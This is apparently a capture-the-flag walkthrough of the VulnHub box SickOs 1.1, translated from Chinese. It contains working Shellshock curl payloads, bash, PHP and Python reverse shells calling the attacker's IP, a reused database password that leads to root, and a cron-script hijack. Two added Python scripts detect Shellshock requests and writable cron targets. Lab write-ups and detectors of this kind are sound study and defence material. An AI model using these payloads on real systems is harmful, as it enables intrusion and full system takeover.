[攻略鸭] SickOs 1.1 VulnHub Target Walkthrough

The contents of this article are purely fictional. 攻略鸭 asks for your follows and likes!
Attacker machine IP address: 192.168.31.167
External information gathering
Obtain the target's IP address
$ sudo arp-scan -l
192.168.31.147
Port scanning
Nmap results:
22/tcp open ssh syn-ack ttl 64 OpenSSH 5.9p1 Debian 5ubuntu1.1
3128/tcp open http-proxy syn-ack ttl 64 Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
squid
msf6 > search squid
msf6 > use auxiliary/scanner/http/squid_pivot_scanning
> set RPORT 3128
> set RHOSTS 192.168.0.10
> set RANGE 192.168.0.10
msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
[+] [192.168.0.10] 192.168.0.10 is alive.
[+] [192.168.0.10] 192.168.0.10:80 seems open (HTTP 200, server header: 'Apache/2.2.22 (Ubuntu)').
[-] [192.168.0.10] 192.168.0.10:443 unknown Squid proxy error: 'ERR_UNSUP_REQ 0' (HTTP 501)
Configure an HTTP proxy in the browser
HTTP Proxy 192.168.31.147 3128
and also send localhost and 127.0.0.1 through the proxy
Burp upstream proxy configuration
System-wide: export http_proxy="http://192.168.31.147:3128" (partially effective for ffuf, effective for cURL; has no effect on nmap, nikto or the browser)
http://192.168.31.147/ can now be accessed
Directory enumeration
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.147/FUZZ -e .php,.txt,.html -c -ic -x http://192.168.31.147:3128
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost/FUZZ -e .php,.txt,.html -c -ic -x http://192.168.31.147:3128
Results:
connect [Status: 200,
index [Status: 200,
index.php [Status: 200,
robots.txt [Status: 200,
robots [Status: 200,
/cgi-bin/ 403
robots.txt
User-agent: *
Disallow: /
Dissalow: /wolfcms
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost/cgi-bin/FUZZ -e .php,.txt,.html -c -ic -x http://192.168.31.147:3128
status [Status: 200,
wolfcms
Visiting http://192.168.31.147/wolfcms/ reveals a blog
Article management: Posted by Administrator
$ searchsploit wolfcms
Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting | php/webapps/18652.txt
WolfCMS 0.8.3.1 - Cross-Site Request Forgery | php/webapps/44418.txt
WolfCMS 0.8.3.1 - Open Redirection | php/webapps/44421.txt
$ searchsploit wolf
Wolf CMS - Arbitrary File Upload / Execution | php/webapps/38000.txt
Wolf CMS 0.6.0b - Multiple Vulnerabilities | php/webapps/15614.html
Wolf CMS 0.7.5 - Multiple Vulnerabilities | php/webapps/18545.txt
Wolf CMS 0.8.2 - Arbitrary File Upload | php/webapps/36818.php
Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit) | php/remote/40004.rb
$ searchsploit -m 44421
http://192.168.31.147/wolfcms/?/admin/login
$ searchsploit -m 38000
http://192.168.31.147/wolfcms/?/admin/plugin/file_manager/browse/
Exploitation
1. ShellShock vulnerability
Verification:
$ curl -H "user-agent: () { : ;};echo;echo;/bin/bash -c 'cat /etc/passwd'" http://192.168.31.147/cgi-bin/status -x http://192.168.31.147:3128
root:x:0:0:root:/root:/bin/bash
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
Get a shell:
nc -nvlp 1233
curl -H "user-agent: () { : ;};echo;echo;/bin/bash -i &>/dev/tcp/192.168.31.167/1233 <&1" http://192.168.31.147/cgi-bin/status -x http://192.168.31.147:3128
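From the defender's side, the request above leaves a distinctive trace: the bash function prologue "() {" inside an HTTP header. The following Python script is an added example and not part of the original walkthrough. It scans Apache combined-format access log lines and reports requests carrying that pattern in the User-Agent or Referer field. The log lines are constructed samples, and the field layout assumes Apache's default combined LogFormat.

```python
import re
from typing import List, Tuple

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Shellshock trigger: a bash function definition "() { ... };" at the start of
# an environment variable; a vulnerable bash executes whatever follows the "};".
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')

# Constructed sample log lines (not captured from the box). The second and
# third mirror the curl request above; the client shows as 127.0.0.1 because
# the request arrived through the Squid proxy running on the same host.
SAMPLE_LOG = [
    '192.168.31.5 - - [05/Dec/2015:10:00:01 +0000] "GET /index.php HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '127.0.0.1 - - [05/Dec/2015:10:00:07 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 1280 "-" "() { : ;};echo;echo;/bin/bash -c \'cat /etc/passwd\'"',
    '127.0.0.1 - - [05/Dec/2015:10:00:09 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 0 "() { :;}; /bin/true" "curl/7.68.0"',
    'this line is not in combined format and is skipped',
]


def find_shellshock_attempts(log_lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Return (client_ip, path, header, status) for every line whose
    User-Agent or Referer carries a Shellshock-style function definition."""
    hits = []
    for line in log_lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue
        for header in ("ua", "referer"):
            if SHELLSHOCK_RE.search(m.group(header)):
                hits.append((m.group("ip"), m.group("path"), header, m.group("status")))
                break  # one finding per request is enough
    return hits


def cgi_hits(hits):
    """Narrow to requests that reached a CGI path, where request headers are
    exported as environment variables for the script's shell."""
    return [h for h in hits if h[1].startswith("/cgi-bin/")]


if __name__ == "__main__":
    for ip, path, header, status in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{ip} -> {path} via {header} (HTTP {status})")
```

Because the request enters through the Squid instance on the same host, Apache's %h field records the proxy's address rather than the real client, so correlate with Squid's own access log (or configure mod_remoteip to trust X-Forwarded-For from the proxy) to recover the origin. Detection of this kind complements, but does not replace, applying the bash patch that stops function definitions being imported from the environment.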
2. Log in to Wolf CMS with a weak password and upload a PHP reverse shell
Log in with the weak credentials admin:admin:
Wolf CMS 0.8.2
Name: Administrator
Username: admin
Upload a PHP reverse shell:
Click the Files tab, create the php-reverse-shell as s.php under the /wolfcms/public/ directory, and set its permissions to 777
$ nc -nvlp 1234
$ nc -nvlp 2345
Visit: http://192.168.31.147/wolfcms/public/s.php
$ whoami
www-data
$ bash -c "bash -i >& /dev/tcp/192.168.31.167/2345 0>&1"
Privilege escalation
$ python -c 'import pty; pty.spawn("/bin/bash")'
1. Password reuse and sudo escalation
/var/www/wolfcms/config.php:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
Password reuse:
$ su sickos
Password: john@123
sudo escalation:
$ sudo -l
(ALL : ALL) ALL
sickos@SickOs:~$ sudo su
root@SickOs:~#
2. Cron job running a world-writable Python file
www-data@SickOs:/var/www$ ls -al
-rwxrwxrwx 1 root root 109 Dec 5 2015 connect.py
$ cat connect.py
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"
$ ls -alhR /etc/cron*
/etc/cron.d:
-rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
-rw-r--r-- 1 root root 52 Dec 5 2015 automate
-rw-r--r-- 1 root root 544 Jul 2 2015 php5
$ cat /etc/cron.d/automate
* * * * * root /usr/bin/python /var/www/connect.py
Change the contents of connect.py to:
#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.31.167",1222))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
# id
uid=0(root) gid=0(root) groups=0(root)
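The root cause of this escalation is a root cron job whose target script any user can edit. The Python audit below is an added example, not part of the original walkthrough: it parses /etc/cron.d entries and flags absolute paths in root-run commands that are group- or world-writable or not owned by root. The cron file text and the permission table are constructed samples mirroring the listings above; stat_map_from_fs() shows how to build the same table from a live system.

```python
import os
import stat
from typing import Dict, List, Tuple

# Constructed sample /etc/cron.d file modelled on the "automate" entry above,
# plus an environment line, a comment, a benign root job and a non-root job.
SAMPLE_CRON_D = """\
SHELL=/bin/sh
# m h dom mon dow user command
* * * * * root /usr/bin/python /var/www/connect.py
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
@reboot www-data /usr/bin/touch /tmp/booted
"""

# Constructed stand-in for os.stat(): path -> (st_mode, st_uid).
# /var/www/connect.py is -rwxrwxrwx root root, as in the ls -al output above.
SAMPLE_STAT: Dict[str, Tuple[int, int]] = {
    "/usr/bin/python": (0o100755, 0),
    "/var/www/connect.py": (0o100777, 0),
    "/usr/sbin/logrotate": (0o100755, 0),
    "/etc/logrotate.conf": (0o100644, 0),
    "/usr/bin/touch": (0o100755, 0),
}


def parse_cron_d(text: str) -> List[Tuple[str, str]]:
    """Return (user, command) for each job line of a /etc/cron.d file.
    Unlike user crontabs, cron.d lines carry a user field before the command."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:        # SHELL=, PATH=, MAILTO= ...
            continue
        if line.startswith("@"):          # @reboot, @daily, ...: one schedule token
            fields, expected = line.split(None, 2), 3
        else:                             # five time fields
            fields, expected = line.split(None, 6), 7
        if len(fields) != expected:
            continue
        jobs.append((fields[-2], fields[-1]))
    return jobs


def find_writable_cron_targets(jobs, stat_map):
    """For root-run jobs, flag every absolute path on the command line that a
    non-root user could replace: group/world-writable or not owned by root."""
    findings = []
    for user, command in jobs:
        if user != "root":
            continue
        for token in command.split():
            if not token.startswith("/") or token not in stat_map:
                continue
            mode, uid = stat_map[token]
            reasons = []
            if mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if mode & stat.S_IWGRP:
                reasons.append("group-writable")
            if uid != 0:
                reasons.append(f"owned by uid {uid}")
            if reasons:
                findings.append((token, command, ", ".join(reasons)))
    return findings


def stat_map_from_fs(paths):
    """Build the same (mode, uid) table from a live filesystem, skipping
    paths that do not exist."""
    table = {}
    for p in paths:
        try:
            st = os.stat(p)
        except OSError:
            continue
        table[p] = (st.st_mode, st.st_uid)
    return table


if __name__ == "__main__":
    jobs = parse_cron_d(SAMPLE_CRON_D)
    for path, command, why in find_writable_cron_targets(jobs, SAMPLE_STAT):
        print(f"{path}: {why}  (job: {command})")
```

The check only looks at the files named on the command line; a writable parent directory (which would let a user rename the script and drop in a replacement) is a separate finding that this example does not cover. The fix on the box side is the usual one: the script and its directory owned by root with mode 755 or tighter, so the cron job cannot be pointed at attacker-controlled content.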
Other
flag
# cat a*
If you are viewing this!!
ROOT!
You have Succesfully completed SickOS1.1.
Thanks for Trying
Questions / help wanted
I don't fully understand the proxy configuration. How should proxychains be configured for this box?